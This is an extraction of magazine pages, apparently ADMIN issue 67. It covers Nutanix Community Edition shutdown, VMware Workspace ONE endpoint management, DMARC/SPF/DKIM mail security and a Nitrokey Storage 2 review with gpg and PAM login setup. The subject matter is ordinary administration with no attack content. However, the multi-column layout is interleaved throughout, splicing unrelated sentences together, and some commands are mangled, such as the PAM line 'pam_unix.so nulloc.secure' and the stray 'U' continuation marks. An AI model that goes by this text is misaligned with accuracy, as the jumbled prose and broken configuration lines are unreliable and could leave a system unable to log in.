the Life Cycle Manager (LCM). Install, then select whether you want Now that Prism Central is available,
Additional information on LCM can a clustered installation and whether you can move on to test the scalable
be found online [6], or simply go to you want to roll out a LARGE or a file server, the similarly scalable ob-
the Prism Element UI and click on SMALL environment. Next, enter ject store, or S3 storage from Nutanix,
Home | LCM. You will then be guided the IP address, the gateway, and at or you can take a closer look at the
by the system and provided the nec- least one DNS server and click on micro-segmentation solution, Flow. If
essary information, such as the Nuta- Deploy to roll out the Prism Central you want to familiarize yourself with
nix knowledge base (KB) articles. VM in the cluster. Once the installa- automating workloads or work pro-
Once you have familiarized yourself tion process is complete, as shown cesses, Calm is certainly a must for
with the platform and tested your by the task display in Prism Element, you, or you can go one step further
own workloads extensively with the register your Prism Central with your and test Karbon.
Community Edition, take the next NEXT account. Karbon lets you roll out complete Ku-
step and test the other Nutanix prod- To do so, log on to your new Prism bernetes clusters within the Nutanix
ucts on your CE HCI cluster. First, in- Central at https://<IP address Prism platform in an automated process. If
stall Prism Central, which is the basis Central>:9440 with the admin ac- you are also interested in DIY auto-
for many other products. Deploying count and nutanix/4u as the pass- mation, you have massive opportuni-
Prism Central requires only a few word. You will recall the initial login ties for programming with acli, ncli,

Figure 5: The main dashboard of Prism Element with the home site.

Figure 6: Cluster management is now possible in Prism Central.

56 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Nutanix Community Edition CO N TA I N E R S A N D V I RT UA L I Z AT I O N

the Nutanix REST API, or PowerShell, cvm_shutdown the environment and exploring the
for which, of course, the correspond- platform. If you want to deploy the
ing Nutanix commandlets are also The CVM shuts down after you are cluster in a production environ-
available. As you can see, you can automatically logged off. Third, go to ment, you will need the full version,
get a huge amount of experience with the AHV’s CLI and enter: but both versions of Nutanix are
the Nutanix Community Edition and easy to use and flexible. Q
gain insight into the manufacturer’s poweroff
solutions. Info
Wait until the NUC has been com- [1] Creating a Nutanix account: [https://www.
Startup and Shutdown pletely switched off by the system. To nutanix.com/products/register]
start up again, switch on the NUC and [2] Nutanix portal: [https://next.nutanix.com]
After the install, the cluster is running; wait until you can access the Prism [3] Rufus: [https://rufus.ie/en/]
however, you might want to shut it Element UI on https://<IP address of [4] Overview of Prism Element:
down and start it up again later. First, CVM>:9440. Depending on the hard- [https://www.youtube.com/watch?
shut down all your workloads and ware, this may take a few minutes. v=zQkSKix3qWs]
Prism Central. If you are unable to ini- [5] Commands and scripts: [https://portal.
tiate a shutdown from your workload Conclusions nutanix.com/page/documents/details?
itself, use the Prism Item UI under targetId=Command-Ref-AOS-v5_20]
Home | VM, for example, to change If you want to set up a cluster with- [6] Information on Life Cycle Manager:
the power state of a VM. out too much overhead, you will [https://portal.nutanix.com/page/
Second, shut down the CVM by go- find it fairly easy to do with Nutanix documents/details/?targetId=Life-Cycle-
ing to the CVM’s command line and Community Edition. This free ver- Manager-Guide-v2_4:Life-Cycle-Manager-
entering: sion is primarily intended for testing Guide-v2_4]
CO N TA I N E R S A N D V I RT UA L I Z AT I O N VMware Workspace ONE

Workspace ONE for endpoint management

Empowered
VMware Workspace ONE provides a secure and user-friendly digital workplace. We look at the features, components,
and architecture of Workspace ONE, as well as application management and simplification of the integration of end
devices through user self-enrollment. By Jens-Henrik Söldner
The trend is moving away from (bring-your-own-devices, BYODs), combines the administration of users
stationary and toward mobile work- uniformly and centrally into the exist- and user groups, the assignment of
places. That said, it is still important ing infrastructure with the help of a access authorizations to the applica-
for the IT department to manage secure platform. The overriding goal tions, and the setup and provisioning
all end devices efficiently. Because is to organize application lifecycle of virtual desktops with the respective
of all the different operating sys- management. The overall strategy is applications in a catalog (Figure 1).
tems, a clear-cut tool for endpoint known as Unified Endpoint Manage- The Access component provides
management is essential. VMware’s ment (UEM) and is one of the two a connector to other identity (ID)
Workspace ONE [1] aims to integrate core components of Workspace ONE. providers such as Ping, Okta, and
all of a company’s devices, includ- In addition to UEM, the second core Microsoft Azure, providing a common
ing devices belonging to employees component, Workspace ONE Access, catalog interface for all applications.

Lead Image © Davorr, Fotolia.com

Figure 1: Managing user access with Workspace ONE Access involves various modules. Image courtesy VMware. [2]

58 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 VMware Workspace ONE CO N TA I N E R S A N D V I RT UA L I Z AT I O N

Table 1: Workspace ONE Components Q On-premises deployment of Work-

space ONE Access and Workspace
Component Function
ONE UEM.
VMware Workspace ONE UEM Enterprise mobility management Q Cloud-based deployments of Work-
VMware Workspace ONE Access Identity platform space ONE Access and Workspace
VMware Workspace ONE Intelligence App analysis and automation ONE UEM.
Workspace ONE App User access to apps Q Hybrid deployments with different
VMware Horizon Virtual desktops and remote desktop services (RDS)
components available either on-
premises or in the cloud.
VMware Workspace ONE Boxer Secure email client
VMware Workspace ONE Browser Secure web browser
VMware Workspace ONE Content Mobile repository for content
Basic EMM Features
VMware Workspace ONE Tunnel App VPN access to enterprise resources As mentioned earlier, administrators
VMware AirWatch Cloud Connector and Synchronization with enterprise directories can deploy, manage, and secure appli-
VMware Identity Manager Connector cations with Workspace ONE. In do-
VMware Unified Access Gateway Gateway for secure Edge services ing so, IT can leverage interfaces for
VMware Workspace ONE Secure Email Gateway Email proxy server diverse operating systems to configure
mobile devices such as notebooks,
Certificate Authority Integration Lifecycle management of provided certificates
smartphones, and tablets in line
VMware Email Notification Service Email messaging for Workspace ONE Boxer on iOS with corporate policies. Workspace
ONE’s UEM accesses enterprise mo-
The AirWatch Cloud Connector, in access their applications through bile management (EMM) interfaces
turn, securely transmits requests from Workspace ONE according to the de- to provision, configure, and secure
Workspace ONE UEM to the back-end fined settings and configurations. Fig- applications and devices. This level
infrastructure. Table 1 provides an ure 2 illustrates the interaction of the of control enables IT to implement a
overview of all components of Work- various components and interfaces in flexible BYOD program that lets users
space ONE. Workspace ONE. choose their devices.
Workspace ONE services are based on In this context, EMM is an umbrella
Architecture and Services the integration of VMware Workspace term for systems that manage mobile
ONE UEM, Workspace ONE Access, devices in the enterprise. It is subdi-
Administrators use Workspace ONE and VMware Horizon. Deployment vided into the following subareas:
to define user groups, policy settings, can be achieved in a variety of con- Q Mobile device management
and device configurations. Users then figurations, including: (MDM): Manages mobile devices

Figure 2: A schematic overview of Workspace ONE shows the interplay of the numerous components and interfaces. Image courtesy VMware. [3]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 59
CO N TA I N E R S A N D V I RT UA L I Z AT I O N VMware Workspace ONE

with software and hardware as registration establishes the initial cloud, mobile, Mac, and Windows
specified by the enterprise. communication with Workspace ONE applications through the unified Intel-
Q Mobile application management UEM to enable EMM. ligent Hub application catalog, which
(MAM): Manages the software in- Another component of UEM is data includes applications for deployment
stalled on mobile devices through leakage protection. Examples of po- in the main Workspace ONE Access
an internal company app store. tential data leaks include saving work and Workspace ONE UEM compo-
Q Mobile content management documents to a public storage device nents. Therefore, when configuring
(MCM): Provisions the company’s such as Dropbox or receiving work Intelligent Hub, you need to connect
own applications and enables files email with an unmanaged email cli- Workspace ONE UEM with Workspace
and documents to be passed on to ent. Other security measures include ONE Access. Table 2 shows which
colleagues, business partners, and encrypting and restricting email traffic, type of deployment Workspace ONE
customers by the mobile route. such as editing and sharing attached provides for each operating system.
files. The company can also require In addition to the application types in
Profiles and Software that only applications provided by Table 2, supported applications also
the enterprise are used instead of include VMware ThinApp, VMware
Distribution OS-native applications. The choice of Horizon 7, VMware Horizon Cloud
The use of device profiles changes the browser can also be restricted for users Service, and applications published
behavior of enrolled devices. Device to ensure secure browsing. by Citrix. Furthermore, the catalog
profiles, combined with compliance Workspace ONE lets you integrate ex- supports virtualized desktops.
policies, help enforce corporate rules isting ID providers, such as Microsoft’s
and procedures. For example, Work- Active Directory or another LDAP- SSO and Two-Factor
space ONE UEM device profiles can be based directory, to implement user
created on the basis of criteria such as synchronization, authentication, and
Authentication
users, groups, platforms, and operat- application access. Finally, the tool en- Users install the Workspace ONE app
ing systems. You can also create smart ables simplified software distribution. on a mobile device and gain single
groups, which are customizable groups Deploying, updating, and deleting soft- sign-on (SSO) access to enterprise,
that allow you to filter dynamically. ware packages can all be automated. cloud, and mobile apps with their cor-
User groups can control the assign- Moreover, you can distribute the porate credentials. The Workspace ONE
ment of access authorizations indi- packages in predefined time windows application leverages native operating
vidually on the respective devices. and as a function of the network in- system features to protect application
Workspace ONE UEM lets you create frastructure load, and notifications for access (e.g., biometric fingerprint read-
device-specific profiles for the indi- upcoming software updates lets users ers on Android, Touch ID on iOS, and
vidual operating systems. The func- prepare for them accordingly. Windows Hello on Windows 10).
tions are adjustable to suit require- Mobile SSO establishes trust between
ments, which means you can activate Provisioning an Application the user, device, application, and
or deactivate one or more functions, enterprise and enables one-touch
such as switching off the Siri voice
Catalog mobile application logins. To protect
assistant on Apple devices. A wizard that acts as a checklist more sensitive applications, you can
However, profiles need to be set guides you through the individual enable biometric or other multifac-
up categorically and in a granular settings in the UEM console, step by tor authentication methods. Mobile
way. This approach simplifies the step. The wizard is divided into four SSO is available for Android, iOS, and
management of individual profiles. modules: Workspace ONE, Devices, Windows 10 devices.
As a result, they are not valid for all Content, and Application. Each mod- In combination with the VMware
devices but, instead, are specifically ule contains instructions on how to Verify mobile app, strong, multifac-
for the selected operating system in achieve specific goals. Because some tor authentication is also possible,
the matching smart group. Device steps overlap in some modules, the simplifying access across devices.
wizard tracks When a user attempts to access the
Table 2: Deployment Types by Operating System progress across Workspace ONE application store or
Platform/Application Internal Public Web Purchased all four mod- any other application that requires
iOS √ √ √ √ ules, ensuring strong authentication, Verify sends a
that the same notification to the user’s cell phone,
macOS √ – √ √
step never which provides additional security for
Android √ √ √ – needs to be per- applications that do not inherently of-
Google Chromebook – – √ – formed twice. fer multilevel authentication.
Windows Phone √ √ – – Workspace ONE For authentication, Workspace
provides users ONE provides multiple options to
Windows Desktop √ √ √ –
with access to configure network-, platform-, and

60 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 VMware Workspace ONE CO N TA I N E R S A N D V I RT UA L I Z AT I O N

application-specific criteria. Once it between the Internet and the Air- the user, and the user can access the
has been configured and security rules Watch environment. An intrusion deployed applications within the In-
have been created, compliance with detection system (IDS) monitors all telligent Hub catalog.
security rules is mandatory. On the internal network traffic, logs it, and Unlike Android devices, however,
device, access to applications is not sounds the alert when suspicious Apple devices require an additional
allowed until the security rules are network activity is detected. step before going live: an installation
accepted and proof of compliance is Other security features include: of one or more profiles. Once installed
maintained. Compliance rules protect Q isolation of all Workspace ONE and connected to the Workspace ONE
against rooted devices or devices with UEM web servers with a demilita- server, a window opens in the applica-
jailbreak. These rules can also be used rized zone (DMZ), tion asking you to create a profile. This
to allow or prohibit applications. Q antivirus clients to protect all serv- step takes place outside of Workspace
ers, and ONE, in the settings of the Apple
Adaptive Management Q spam filtering and spam reporting device. After successfully creating a
for email. profile, the device is finally registered,
With adaptive management, users do From a web-based HTML5 manage- and the user can access the applica-
not log their devices into Workspace ment console, you can control Work- tion provided on the Intelligent Hub
ONE UEM to access apps that require space ONE UEM. All data transferred catalog. Likewise, you can view the
only a basic level of security. Instead, between the web console and mobile registered device from the UEM plat-
users download the Workspace ONE devices is encrypted. To ensure the form and manage it as needed.
mobile app from the appropriate app environment meets the latest security At all times you have the option to
store and log in with their credentials. standards, the cloud-based Work- de-register the registered devices with
From here, they can access their au- space ONE components automatically what is known as an “enterprise wipe,”
thorized applications. For apps that update and patch themselves. which deletes the changes made to the
require a higher level of security, user The approach to data center security device by Workspace ONE. Another
access may only be possible after de- is multilayered. Primary data centers action is known as a “device wipe,”
vice registration. have onsite backups for rapid recov- which resets the device back to the fac-
According to the assigned device pro- ery and replicated offsite backups for tory settings and deletes all data.
file, the catalog displays all authorized disaster recovery. Production systems
mobile, software as a service (SaaS), are hosted in two primary data centers, Conclusions
virtual, and desktop applications. Ap- with cross-site replication of nightly
plications that require re-registration backups to support performance, Thanks to Workspace ONE UEM,
are marked with a lock icon. When growth, and security requirements. enterprises can easily integrate a fleet
users try to download software with of mobile devices. Additionally, Work-
this icon, a registration process begins. Self-Enrollment of Private space ONE Access enables the imple-
For example, users could obtain a con- mentation of corporate policies and
ferencing application such as WebEx
Devices the unified deployment of applica-
without registering. However, down- Finally, I look at self-enrollment as one tions. Other access components, such
loading enterprise applications such as of the many options for registering as the Airwatch Cloud Connector
Salesforce requires registration. a device in Workspace ONE. For an (ACC), support the integration of lo-
iPhone, for example, you need to install cal and cloud-based LDAP directories.
Secure Integration with the the Intelligent Hub application from Workspace ONE can therefore be seen
the App Store for the target device. To as a comprehensive tool for central-
Enterprise Network establish a connection from the target ized and uniform management of end
Workspace ONE UEM leverages device to the UEM, the server address devices and mobile work. Q
the company’s existing network and the respective group ID must be
infrastructure to provide its own entered. After entering and establishing Info
high availability, redundancy, and the connection, the user logs in with [1] VMware Workspace ONE: [https://www.
scalability for the applications and credentials provided by the enterprise. vmware.com/products/workspace-one.html]
desktops that are ultimately deliv- The successful login is followed by a [2] Workspace ONE Access: [https://techzone.
ered to end users. To this end, local manual installation routine, which is vmware.com/resource/business-continuity-
load balancing is integrated on the used to complete mobile device man- vmware-solutions-remote-work#existing-
back end of the SaaS environment. agement registration. workspace-one-uem-and-access]
The backbone security infrastruc- The previous steps are virtually the [3] Cloud-based logical architecture:
ture includes redundant Ethernet same for Android devices, the differ- [https://techzone.vmware.com/
switches, LAN separation, firewalls, ence being that they can be used after resource/vmware-workspace-one-and-
intrusion detection, and monitor- a successful connection. That is, you horizon-reference-architecture-overview#
ing. Redundant firewalls are located can make the resources available to cloud-based-logical-architecture]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 61
S EC U R I T Y DMARC

Secure email communication

Trustworthy
DMARC combines the abilities of SPF and DKIM to safeguard and protect against spam and phishing and allows
targeted configuration according to company policy. By Matthias Wübbeling

IT administrators, no matter their information about blocking mail mail servers also use them. Because
level of experience, agree that man- servers and recommendations for ac- fake senders can be blocked even
aging mail servers is one of the su- tion on a website set up specifically before email is received, the incom-
preme disciplines. Too many fragile for this purpose [1]. If you have the ing spam volume is automatically
system settings, too many pitfalls, mail server under strict control, you reduced. The integration of cor-
and above all, public pillories in do not need to worry about problems responding tests for receiving mail
the form of blacklists if something with delivery to Live, Hotmail, or servers is described in the documen-
goes wrong during configuration. Outlook servers. tation for the Exim and Postfix mail
All the more respect goes to the ad- In this article, I look at how to secure transfer agents.
mins who successfully manage mail email with the Domain-based Mes- Probably the most important step
servers, keep them permanently sage Authentication, Reporting, and is to set up a Sender Policy Frame-
available, and ensure that outgoing Conformance (DMARC) email authen- work (SPF) record in the domain
email reaches the intended recipient tication protocol. name system (DNS) that lets ad-
reliably. mins specify authorized outbound
Microsoft in particular and the email Secure Mail Dispatch mail servers. Although designed in
service providers they control are 2004, SPF only became the stan-
considered particularly strict when Even though spam filtering and dard recommended by the Internet
it comes to accepting messages from malware detection when receiving Engineering Task Force (IETF) in
third-party servers. Although some email play a major role in corporate 2014 [2]. From a sample of more
Photo by Simon Moog on Unsplash

people claim that Microsoft is delib- security, in this article, I only look than 3,000 domains belonging to
erately filtering third-party providers at how to secure email transmis- German companies, I examined the
to boost the number of customers for sion. Of course, the measures I will DNS records and determined the
its own services, this prejudice can- be looking at also indirectly con- number of valid SPF records. About
not be confirmed on closer inspec- tribute to the security of enterprise 25 percent of these domains do not
tion. Microsoft offers comprehensive email accounts, as long as the other have an SPF record stored, which

62 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 DMARC S EC U R I T Y

means that recipients cannot check Guidelines with DMARC mail server then becomes a relay
whether the delivering mail server for external senders and sends
is allowed to send messages for the SPF entries come with instructions on email on their behalf to all recipi-
sender domain. how to deal with senders not men- ents specified in the forwarding
This situation opens the door for tioned in the entry, but email without list. This is also how mailing lists,
phishing and CEO fraudsters; there- a DKIM signature should not be re- such as those belonging to the pop-
fore, you should get an overview of jected without further ado. Because ular Mailman software [4], work
your company’s sending mail servers of the different selectors, no uniform by default.
and enter them as SPF records in the DNS entry exists to check the exis- The mail servers of these recipients
DNS. If you can’t easily determine tence of a DKIM key. should reject the messages from your
this list, at least limit sending to your DMARC lets you define appropriate server because your mail server is
company’s subnets and contracted policies for domains, which means probably not registered in the SPF
mail sending service providers. Tak- you can specify that email from a do- record of the original sender. What
ing this step is still better than hav- main always needs to be signed with can help in this case is to set up an
ing no SPF entry at all. Note that the DKIM, even independently of specific SRS service on the mail server that
entry must be created for the domain DKIM selectors. With the associ- rewrites the sender addresses of for-
that is used as the domain part of ated policy, you can then determine warded email to a temporarily valid
the email, not for the (incoming) whether non-signed email will be email address on your server that has
mail server. ignored by the recipient, quarantined, a filter set up. With this new sender
or directly rejected. address, the email then passes the
Signatures with DKIM Additionally, you can specify the SPF check – your server is posted
relative proportion of your email in the SPF entry for the temporary
Domain Key Identified Mail (DKIM) messages for which the DKIM sig- address – and the email can be for-
[3] lets users sign outgoing email nature will be verified. To be on the warded successfully.
with a private key. The server’s safe side, you should, of course,
public key is stored in the domain’s have 100 percent verified. In the Conclusions
DNS. Here, too, the entry must be implementation phase, but also
created for the domain part of the permanently for information pur- For the secure use of email as a me-
email. In contrast to SPF, however, poses, you can store URIs to which dium, servers also need to be con-
multiple keys with different selec- forensic and summary reports of figured comprehensively to check
tors can be managed, which results the DMARC check are sent. You also outgoing messages. The configura-
in DNS entries for different subdo- need to ensure that you can receive tion itself is not at all complicated
mains. For a selector with the name and process the reports sent once or and can be implemented for most
admin-mag, the appropriate DNS en- several times a day by the various mail servers in just a few hours. As
try would be created in admin-mag._ mail servers. an administrator, you can prevent
domainkey.admin-magazine.com. To receive the reports by email, enter third-party mail servers from send-
The selectors are included with the a mailto URI with your email address. ing email on behalf of your own
email signature so that the receiv- However, make sure it matches the domain and causing damage.
ing mail server can select the cor- domain being checked; otherwise, If you consistently use the techniques
rect domain to receive the public other mail servers will initially refuse presented here, you can secure your
key. Because the selector can vary to send the statistics for security rea- mail server against this scenario,
from server to server, and the rec- sons. This behavior can be further which means you also can reliably
ommendation is even to change it customized with additional DNS send messages from your own mail
regularly, it is not possible to make entries and use other domains for re- server to particularly restrictive mail
a comprehensive statement about ceiving DMARC reports. servers of large enterprises, such as
the implementation of DKIM on the Microsoft or Google. Q
Internet within the scope of this ar- Silent Mail with SRS
ticle. As a lower boundary, however,
it can at least be stated that around Another aspect of mail server op- Info
13 percent of the domains tested eration – especially if you maintain [1] Outlook page on outbound mail problems:
have entered one of the standard mailing lists or allow forwarding [https://sendersupport.olc.protection.
selectors from the documentation to external email addresses – is the outlook.com/pm/troubleshooting.aspx]
and tutorials. However, it is not pos- Sender Rewriting Scheme (SRS). [2] RFC 7208 on SPF:
sible to say reliably whether this Suppose you set up forwarding of [https://www.rfc-editor.org/rfc/rfc7208.txt]
actually signs outbound messages, an email address, as in distribu- [3] RFC 4870 on DKIM: [https://www.
if the incoming email message was [email protected], to rfc-editor.org/rfc/rfc4870.txt]
not signed. external recipients. Your incoming [4] Mailman: [https://list.org]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 63
S EC U R I T Y Nitrokey

Hardware-enhanced security

Key to Security
Nitrokey hardware authentication devices aim to raise data encryption, key management, and user
authentication security to the next level. By Rubén Llorente
Consumer-grade security imple- have alternatives to running your se- that connect to your computer or
mented by software is cost effective curity applications in software only: server over the universal serial bus
for most users, who may install and Nitrokey. (USB). The manufacturer offers a
run password managers, encryption whole range of models with different
tools, and other privacy programs for Enter the Key capabilities, with prices ranging from
virtually no cost; however, software EUR29 to 109 (VAT not included; or
comes with limitations. Nitrokey GmbH [1] is a German about $25–$88). They also produce a
Most users can live with these limi- hardware company focused on se- line of Qubes OS-certified laptops and
tations, but if you are exceptionally curity products. Its main product Nextcloud appliances and provide a
conscious of your privacy or handle line is a variety of Nitrokeys, which free Matrix instance for those who
top secret data, you do not want to are hardware authentication tokens want a secure chat platform.
take any chances. Thankfully, you in the form of pen-drive-sized units The Nitrokey website claims that their
hardware can be used to enhance the
security of certain web logins, email
encryption, hard disk encryption, and
SSH access. Whether this is true, and
whether a Nitrokey is worth the cost,
is what I intend to determine in this
article.
I am reviewing Nitrokey Storage 2, the
most featureful Nitrokey available. For
EUR109 plus taxes and shipping, you
get a Nitrokey with 16GB of encrypted,
tamper-resistant storage, a password
manager, and a sticker (Figure 1). What
it lacks is a manual, which is disap-
Lead Image © Jeff Metzger, 123RF.com

pointing. For the price, they should

have included at least a quickstart
guide. Instead, a label in the packaging
instructs you to check the online docu-
mentation [2] for instructions.
Figure 1: A Nitrokey Storage 2 comes with a keychain hole and a sticker but no instruction The Nitrokey looks solid enough, but
manual. I have seen Kingston pen drives that

64 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Nitrokey S EC U R I T Y

initialize a new Nitrokey retrieved by any means, even if the

can be installed by issu- operating system is compromised.
ing the commands: The Nitrokey boasts tamper-resistant
storage, which in theory makes it im-
sudo apt update possible to access the private keys by
sudo apt install nitrokey-app prying the Nitrokey open.
Although not emphasized in the doc-
The Nitrokey App ends umentation, it is very important that
up under the Accessories the public keys are exported right
category of the Start away, using
menu, from which the
program may be launched gpg --armor --export <yourID> > key.asc
and the Nitrokey plugged
Figure 2: An inexpensive OTG adapter would let you use a in for initialization. The because they must be imported
Nitrokey with an Android phone. documentation instructs manually in every other computer
you to change the default on which you intend to use the Ni-
looked hardier. The cap that covers user and admin PINs and then load trokey. The pen drive is not capable
the USB plug might to be easy to lose either OpenPGP or S/MIME keys into of generating them on its own. If the
because you don’t have a way to at- the Nitrokey (see the “What is Open- computer on which you generated
tach it to the body of the Nitrokey PGP?” box). The steps for changing the keys is lost (which actually hap-
while the device is in use. the PINs are very intuitive (Figure 3), pened during my tests) and you have
but key initialization is not. no copy of the public keys, the keys
Getting Started I decided to generate an OpenPGP set in the Nitrokey will be, for all intents
of keys for testing, but the steps sug- and purposes, unusable, and you will
Your computer will need a software ap- gested by the documentation failed to need to generate new ones.
plication to interface with the Nitrokey. function. As an alternative, I issued GNU Privacy Guard (GPG) or soft-
Thankfully, you are provided a free, the commands ware that leverages GPG for encryp-
open source program [3] that sup- tion (e.g., Pass or Mutt) can then use
ports FreeBSD, macOS, Windows, and $ gpg --edit-card the Nitrokey for decrypting sensi-
many Linux distributions. AppImages, gpg/card> admin tive data with an additional layer of
Flatpaks, and Snaps are also available. gpg/card> generate protection. Because the private keys
Nitrokeys appear to be partially sup- can never leave the Nitrokey, GPG
ported on Android smartphones over to start an interactive menu (Figure sends any material that needs to be
USB On-the-Go (OTG) [4], although it 4) from which I could generate a set processed by the private key (e.g., an
would require an adapter (Figure 2). of keys. The strength of this method encrypted message) into the Nitrokey
In any case, Android is not listed as is that the keys are generated by an
an officially supported platform. internal Nitrokey chip and are never What is OpenPGP?
For testing, I decided to use Knop- accessible to the operating system. OpenPGP [5] is a standard for encrypting
pix 9.1. The software necessary to Therefore, the private keys cannot be messages, particularly email. The theory
behind it is complex, but in essence, each
user creates a private key and a public key,
which are big chunks of cryptographic mate-
rial. Briefly, encryption uses the public key
and signing uses the private key, whereas
decryption uses the private key, and signa-
ture verification uses the public key. When
you want to send an encrypted email, you
place your private key in a safe place (e.g., a
Nitrokey) and give a copy of the public key to
each person from whom you want to receive
encrypted email.
Despite being regarded primarily as an
email encryption protocol – it is commonly
integrated with email clients, such as Thun-
derbird or Claws Mail, to perform encryption
and decryption automatically – OpenPGP has
many other applications. For example, the
Pass password manager uses OpenPGP to
store passwords in encrypted form.
Figure 3: The default PINs are easily guessable and must be changed from the systray applet.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 65
S EC U R I T Y Nitrokey

and replace $application_identifier

with the string you got in the previ-
ous step. This operation requires root
privileges.
The last part is dangerous; mistakes
may render your operating system
unusable, so ensure you have a res-
cue CD around just in case you break
something. You must modify PAM to
accept the Nitrokey. The easiest way
to do this in Ubuntu 21.04 is to open
the file /etc/pam.d/common-auth and
repace the line

auth [success=2 default=ignore] U

pam_unix.so nulloc.secure

Figure 4: The steps described by the official documentation didn’t work, but gpg with the line:
--card-edit made it possible to generate a set of OpenPGP keys on the Nitrokey.
auth [success=2 default=ignore] U
itself, which returns the processed This method is a big upgrade from pam_poldi.so
data back to GPG (in my example, a regular password protection because
stream of unencrypted data). obtaining the password is no longer From now on, you will need to
Therefore, for performing tasks like enough for the attacker. plug the Nitrokey into a USB port
decrypting OpenPGP messages ad- The steps for using the Nitrokey in and enter the PIN for login into a
dressed to a given user, both the such a way are documented [6], graphical session, unlocking the
Nitrokey and the PIN used to unlock but setting up the configuration in- screensaver or even invoking sudo.
it must be under the control of the volves messing with PAM configura- The bad news is that integration
person performing the decryption. If tion files and carries the possibility seems a bit rough around the edges.
the Nitrokey is not plugged in, it is of breaking your operating system For example, the appearance of the
impossible to decrypt any message and rendering it unusable. Addi- Gnome display manager (GDM) is
addressed to the user. Should the tionally, the documentation is not slightly mangled when asking for
Nitrokey be stolen, the keys within very helpful. the Nitrokey PIN instead of a user-
it will be useless to the thief because I used Ubuntu 21.04 to test the Ni- password combination.
they can only be used by the person trokey as a login token. The first step One must wonder whether going
who knows the PIN. The Nitrokey was to install poldi, which is a PAM through this hassle is worth the trou-
provides a limited number of at- component designed to work with ble. It certainly works as advertised,
tempts for guessing the PIN: Once OpenPGP tokens: but the only threat this setup protects
the limit is reached, the keys become against is hardware keyloggers in-
unavailable. sudo apt-get install libpam-poldi tended to steal your login password,
The advantages of using a Nitrokey because the person who planted the
for storing OpenGPG keys are, thus, Next, you need to obtain the applica- keylogger will need your Nitrokey to
substantial. tion ID of the Nitrokey. After plugging log in, even if your PIN is discovered.
it in, issue the command It is a neat concept but not extremely
Protected Computer Login useful. Somebody capable of planting
gpg --card-status | Application a keylogger to steal your password
Nitrokeys may be used as access probably can boot the computer with
tokens for privileged access manage- to see the identifier (e.g., D006000124 a Live CD while nobody is watching
ment (PAM)-enabled distributions. 01020000000000xxxxxxxx). to perform all sorts of horrible deeds
You may, for example, configure your Now, poldi must be informed that it without your credentials.
operating system to allow only you is supposed to manage the authen-
to login if you plug in a Nitrokey that tication of the system user. For ex- Password Management
contains your set of keys. Once this ample, if your login name is linux,
is done, only a person controlling you would place the following line The Nitrokey Storage 2 comes with
both the Nitrokey and its PIN may in /etc/poldi/localdb/users: an integrated password manager. You
login, invoke sudo, or unlock the may use your Nitrokey alongside the
screensaver. $application_identifier linux Nitrokey App to store your passwords

66 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Nitrokey S EC U R I T Y

One-time passwords are strings

generated as a function of the OTP
secret and a predictable factor (e.g.,
time). The user is expected to use
the Nitrokey to generate a one-time
password, which will only be valid
for a short amount of time (typically
less than a minute), that the website
will recognize.
One-time passwords are very strong
because sniffing them is useless.
They are ephemeral, and a given
OTP will never be used again. To
break 2FA, an attacker would need
both your regular password and your
OTP secret. Because the OTP secret
resides only within the Nitrokey,
the attacker would need to get the
Nitrokey itself and the PIN to access
the OTP secret and generate one-
time passwords that a website will
recognize as yours.
Figure 5: The User PIN may be used to retrieve a password stored within the Nitrokey. Breaking 2FA is not trivial. Then
The drawback of this approach is that, once the Nitrokey gives the password over to the again, the Nitrokey represents a
operating system, it could be stolen if the operating system is compromised. massive step up from regular pass-
word authentication. However, a
within the Nitrokey secure storage. manager, it hides an ace up its sleeve: multitude of free software imple-
The passwords stored in such a way one-time passwords (OTPs), which mentations exist for OTP. Most us-
will only be accessible by using the are useful for services that support ers of OTP-based 2FA just install
correct PIN (Figure 5). two-factor authentication (2FA). an application such as mobile OTP
The main limitation of the integrated Websites that support OTP-based 2FA (mOTP) in their smartphones for
password manager is that it has work by generating an OTP secret the same effect. Although it might
room for only 16 passwords. My key, which you must store in a se- be argued that a smartphone is less
personal collection of passwords has cure device (e.g., the Nitrokey); then, secure than the Nitrokey, because a
more than 150 entries in it, so the each time you attempt to access the smartphone can suffer malware at-
Nitrokey falls short. Moreover, the website, it asks for both your regular tacks more easily than a Nitrokey,
integrated password manager does password and a one-time password I am not convinced the security
not offer a high level of protection (Figure 6). gain is high enough to justify the
because it does not conceal the pass-
words themselves from the operating
system as well as it does with private
OpenPGP keys.
The Pass password manager can
take advantage of the Nitrokey and
be configured to use the keys stored
within to manage stored credentials.
The Nitrokey must be plugged in
and the PIN entered to access the
passwords managed by Pass. The
documentation also points out that
KeePass can be configured in a simi-
lar way [7].

One-Time Passwords
Although the Nitrokey is not much Figure 6: The Nitrokey adds security to certain web accounts by enabling 2FA. Once
better than a software password enabled, 2FA requires the appropriate Nitrokey and the password for logging in.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 67
S EC U R I T Y Nitrokey

Why Not 2FA? stolen and its owner captured and

tortured for the password, the user
Two-factor authentication is great when it work with will have the user walk into an of- could provide the PIN for the regular
works, but my experience is that it is awful fice to prove their identity before access is encrypted storage and convince the
when it doesn’t. restored. After all, if something is valuable captors that its contents are the only
I have seen some forums, Cryptocoin ex- enough to protect with 2FA, it is probably too
thing stored in the encrypted vault.
changes, and businesses implement 2FA valuable to consider sending a reset link to
The hidden data would remain con-
because of the security gain. Somebody who an email address. Email accounts are usually
cealed and thus safe.
has 2FA enabled won’t have their account protected by a traditional password: If your
compromised unless both the password and bank was willing to send you a credentials
the OTP device (Nitrokey, smartphone, or simi- reset link by email, an attacker would only Live DVDs and Sensitive
